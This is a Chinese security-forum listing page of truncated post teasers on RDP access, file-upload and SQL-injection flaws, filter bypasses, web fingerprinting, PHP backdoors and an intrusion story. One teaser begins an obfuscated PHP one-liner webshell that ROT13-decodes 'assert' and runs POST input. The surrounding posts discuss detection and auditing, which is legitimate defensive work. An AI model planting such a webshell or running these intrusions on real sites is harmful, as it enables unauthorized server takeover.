显示不全请点击全屏阅读 对于开了3389，连接不上，有几个方面的原因，我来总结下，哇咔咔，这几天提好几台服务器都TM这样，分析下， 原因1、远程桌面端口被更改。2、对方服务器处于内网。 3、防火墙拦截...

显示不全请点击全屏阅读 漏洞发生在插附件的地方。说到插附件各位看官也应该都想到了肯定是文件名。因为文件名是按照本地上传的文件名来显示的。   如果你的操作系统是linux你可以直接修改一个图片文件的文...

显示不全请点击全屏阅读 在漏洞评估和渗透测试中，确定目标应用程序的输入向量是第一步。这篇文章解释了别人是如何通过HTTP头部对你的数据库进行SQL注入攻击的，以及讨论下选择哪种漏洞扫描器测试SQL注入...

显示不全请点击全屏阅读 原文地址：http://bbs.10hst.com/viewthread.php?tid=39&extra=page%3D1 作者：ay暗影 ======绕过防注入系统...

显示不全请点击全屏阅读 最近在写查杀的工具，整理了一些免杀的一句话，顺便自己写了个 <?php $a=str_rot13(‘nffreg’);$a($_POST);?&g...

显示不全请点击全屏阅读   好久没发原创了,这几天准备送上几篇！祝各位朋友新年快乐。   前天在网上找东西就无意进入了linux安全网,闲着无事就有想入侵它的冲动,其实大多数人感觉这些站都很...

显示不全请点击全屏阅读 目前网络上开源的web指纹识别程序很多，如Wapplyzer,BlindElephant，plecost，w3af,whatweb, wpscan, joomscan等等，基本...

显示不全请点击全屏阅读 php后门有很多，包子也见多了和玩多了，但是在一次帮助朋友检查服务器的时候，竟然发现这样的恶意代码。   事情是这样的，朋友的网站的利用各种查找后门的工具都没有发现php木马。...

显示不全请点击全屏阅读 常见的hash加密（来自国外某论坛） —————*nix系————&...

显示不全请点击全屏阅读 前几天一个朋友让我帮他检测一下他网站程序的安全，为了不让我的面子掉一地只有硬着头皮帮他检测啦！ 拿到他的源程序之后就开始我的检测之路啦！   首先我在网站的onews.asp里...